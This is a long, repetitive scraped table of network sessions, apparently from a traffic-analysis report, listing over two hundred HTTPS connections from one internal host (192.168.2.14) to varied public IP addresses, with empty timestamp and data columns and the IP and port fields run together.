                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10477192.168.2.1445252199.166.0.144443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10478192.168.2.144287844.44.135.146443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10479192.168.2.14499062.189.90.37443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10480192.168.2.1453992134.145.180.22443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10481192.168.2.1460982222.203.124.3443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10482192.168.2.1459072123.97.25.203443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10483192.168.2.1445842151.33.20.78443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10484192.168.2.14512608.28.100.136443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10485192.168.2.1438348212.65.121.19443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10486192.168.2.1454340211.129.103.104443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10487192.168.2.1446104134.53.93.93443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10488192.168.2.145419091.165.100.59443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10489192.168.2.143598232.156.139.150443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10490192.168.2.1439768106.51.19.226443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10491192.168.2.144461879.194.8.50443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10492192.168.2.1438998170.164.183.255443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10493192.168.2.144008254.183.162.173443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10494192.168.2.1460142195.6.177.27443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10495192.168.2.1456998210.147.20.187443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10496192.168.2.143655867.90.19.186443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10497192.168.2.1444828200.150.13.76443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10498192.168.2.1456690165.19.201.123443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10499192.168.2.1442966188.150.184.211443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10500192.168.2.1451068132.6.156.32443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10501192.168.2.1442786202.108.1.255443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10502192.168.2.1442958193.184.103.219443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10503192.168.2.1445232155.106.145.78443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10504192.168.2.1441368135.52.166.138443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10505192.168.2.14454822.39.151.205443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10506192.168.2.1443142199.15.28.84443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10507192.168.2.1441786142.0.207.208443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10508192.168.2.146036458.126.137.125443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10509192.168.2.1458396202.117.114.72443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10510192.168.2.1441684142.248.242.23443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10511192.168.2.1450006168.115.92.184443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10512192.168.2.1441048108.21.186.142443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10513192.168.2.144617092.78.78.63443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10514192.168.2.1449884185.235.162.230443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10515192.168.2.1457146130.29.163.224443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10516192.168.2.1457504154.30.203.189443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10517192.168.2.143276839.56.103.152443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10518192.168.2.1439122220.41.57.124443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10519192.168.2.1436194220.170.93.240443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10520192.168.2.1447640179.119.22.254443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10521192.168.2.145453012.106.93.94443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10522192.168.2.1460088180.156.224.81443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10523192.168.2.143657460.126.16.151443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10524192.168.2.1439258202.109.1.226443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10525192.168.2.145914038.50.210.106443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10526192.168.2.1442222203.149.244.157443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10527192.168.2.1435746168.255.5.19443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10528192.168.2.1457392216.92.150.92443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10529192.168.2.1443306151.241.116.15443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10530192.168.2.1451964111.85.125.92443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10531192.168.2.1448226154.68.101.245443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10532192.168.2.145209261.193.160.42443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10533192.168.2.1454254197.248.122.113443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10534192.168.2.1441416184.1.171.196443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10535192.168.2.144672484.51.134.195443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10536192.168.2.144625863.120.252.218443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10537192.168.2.144203432.204.71.66443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10538192.168.2.1446612158.124.89.18443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10539192.168.2.1449832170.95.253.101443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10540192.168.2.143542227.1.42.86443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10541192.168.2.1450376199.209.93.59443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10542192.168.2.1455232148.166.241.157443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10543192.168.2.145328841.60.9.125443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10544192.168.2.144485050.26.44.131443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10545192.168.2.1455244178.241.157.143443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10546192.168.2.1456262118.190.61.174443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10547192.168.2.145892438.91.120.156443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10548192.168.2.1456610114.33.236.14443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10549192.168.2.1455384124.197.221.19443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10550192.168.2.143987866.51.139.29443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10551192.168.2.145815085.128.216.48443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10552192.168.2.1433572107.106.10.147443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10553192.168.2.1459718111.61.109.233443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10554192.168.2.1442670217.168.178.135443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10555192.168.2.14505701.12.190.140443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10556192.168.2.145541649.81.145.4443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10557192.168.2.1447414133.208.126.212443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10558192.168.2.1450606159.89.97.163443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10559192.168.2.1445110119.35.16.58443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10560192.168.2.143730271.75.78.159443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10561192.168.2.1435962113.236.127.117443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10562192.168.2.144378053.37.215.83443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10563192.168.2.1448738200.187.39.151443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10564192.168.2.1435914146.157.23.30443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10565192.168.2.143859493.114.122.208443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10566192.168.2.1444956125.249.170.87443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10567192.168.2.1438122134.40.140.25443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10568192.168.2.1433940118.129.144.49443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10569192.168.2.1459448205.181.48.141443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10570192.168.2.1451026181.132.55.5443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10571192.168.2.1445918206.106.81.110443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10572192.168.2.1453062122.138.37.58443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10573192.168.2.144035498.174.220.92443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10574192.168.2.145810857.221.175.65443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10575192.168.2.1455744129.131.138.251443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10576192.168.2.1437064148.119.189.74443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10577192.168.2.145989252.39.189.101443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10578192.168.2.1442502166.228.21.177443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10579192.168.2.144861460.78.65.251443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10580192.168.2.145185814.159.74.144443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10581192.168.2.14568781.102.108.249443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10582192.168.2.144922019.191.197.4443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10583192.168.2.145275436.39.228.92443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10584192.168.2.1435762154.76.75.127443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10585192.168.2.1460578181.156.127.162443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10586192.168.2.1443100166.163.19.43443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10587192.168.2.1454276121.80.118.91443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10588192.168.2.1434942175.146.106.135443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10589192.168.2.1436512212.35.164.252443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10590192.168.2.1451520119.227.100.9443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10591192.168.2.144229458.198.117.27443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10592192.168.2.1443332206.182.56.44443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10593192.168.2.1450682212.113.108.168443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10594192.168.2.146039446.142.218.28443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10595192.168.2.1460632217.164.237.177443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10596192.168.2.143311045.124.27.142443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10597192.168.2.1448976111.104.82.12443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10598192.168.2.144434043.86.11.222443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10599192.168.2.14581261.230.144.191443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10600192.168.2.144352819.49.239.149443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10601192.168.2.1453838143.184.90.11443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10602192.168.2.1442652112.107.165.122443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10603192.168.2.145607894.6.13.241443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10604192.168.2.145700681.192.166.67443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10605192.168.2.1449824162.12.44.106443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10606192.168.2.1442238184.191.150.13443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10607192.168.2.1435604180.77.55.5443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10608192.168.2.145333252.16.189.173443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10609192.168.2.14388644.58.79.166443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10610192.168.2.1444126160.227.223.182443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10611192.168.2.1446316216.240.104.25443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10612192.168.2.145461077.148.10.59443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10613192.168.2.145849841.232.123.87443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10614192.168.2.1446634181.135.228.54443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10615192.168.2.146039449.162.210.252443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10616192.168.2.144920464.161.93.200443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10617192.168.2.1453572218.129.240.219443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10618192.168.2.1435236212.201.245.105443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10619192.168.2.146090431.55.237.231443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10620192.168.2.14428188.27.193.142443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10621192.168.2.143598864.88.118.98443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10622192.168.2.144031490.70.36.143443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10623192.168.2.145856652.10.93.211443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10624192.168.2.1458552223.234.18.150443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10625192.168.2.1444570193.146.122.23443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10626192.168.2.145648492.48.227.13443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10627192.168.2.144998470.233.132.127443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10628192.168.2.1449866164.161.29.138443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10629192.168.2.1439690100.52.129.253443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10630192.168.2.1443268212.192.10.118443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10631192.168.2.143503096.105.69.173443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10632192.168.2.1447480132.252.231.232443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10633192.168.2.144084054.77.30.81443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10634192.168.2.14479964.195.220.18443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10635192.168.2.144665841.152.150.85443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10636192.168.2.143989824.208.32.134443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10637192.168.2.1442396148.13.126.215443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10638192.168.2.1437710130.83.29.84443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10639192.168.2.1456518177.201.186.58443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10640192.168.2.1448990149.104.75.191443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10641192.168.2.1446692147.86.213.47443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10642192.168.2.1459256202.213.248.158443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10643192.168.2.1458468203.234.231.62443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10644192.168.2.145851477.214.231.120443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10645192.168.2.14539164.187.241.220443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10646192.168.2.1448072147.15.228.34443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10647192.168.2.14486168.82.189.170443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10648192.168.2.144184254.50.231.62443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10649192.168.2.14383548.232.117.149443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10650192.168.2.145834879.129.204.206443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10651192.168.2.1446404110.146.74.91443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10652192.168.2.1439892149.199.120.114443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10653192.168.2.144453659.56.120.250443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10654192.168.2.1448368213.183.57.180443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10655192.168.2.1451626135.115.117.147443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10656192.168.2.145509075.43.164.186443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10657192.168.2.1453422131.218.19.179443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10658192.168.2.145937479.61.162.42443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10659192.168.2.1453026199.247.177.215443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10660192.168.2.1457214118.253.0.95443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10661192.168.2.14429385.35.93.6443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10662192.168.2.144015453.252.208.2443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10663192.168.2.1435802151.237.25.4443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10664192.168.2.143425079.64.14.207443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10665192.168.2.1446442173.233.23.226443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10666192.168.2.145308086.123.199.245443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10667192.168.2.144677247.192.209.22443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10668192.168.2.1457296100.46.209.253443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10669192.168.2.1443906211.245.237.214443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10670192.168.2.1449602212.234.18.48443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10671192.168.2.14410245.63.22.255443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10672192.168.2.1439362109.188.237.143443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10673192.168.2.1439468199.226.145.126443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10674192.168.2.144074876.220.217.204443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10675192.168.2.1446688132.8.26.72443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10676192.168.2.1458554101.127.253.66443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10677192.168.2.144135669.26.15.70443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10678192.168.2.1448008155.177.42.214443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10679192.168.2.143886077.234.34.199443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10680192.168.2.14332324.78.197.41443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10681192.168.2.14397524.231.150.8443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10682192.168.2.143999698.141.77.230443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10683192.168.2.1458300156.137.159.213443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10684192.168.2.1449402102.224.254.250443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10685192.168.2.1458306222.241.243.210443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10686192.168.2.145911880.139.201.126443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10687192.168.2.1456570217.207.98.69443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10688192.168.2.1433548133.118.26.100443
                                                      TimestampBytes transferredDirectionData


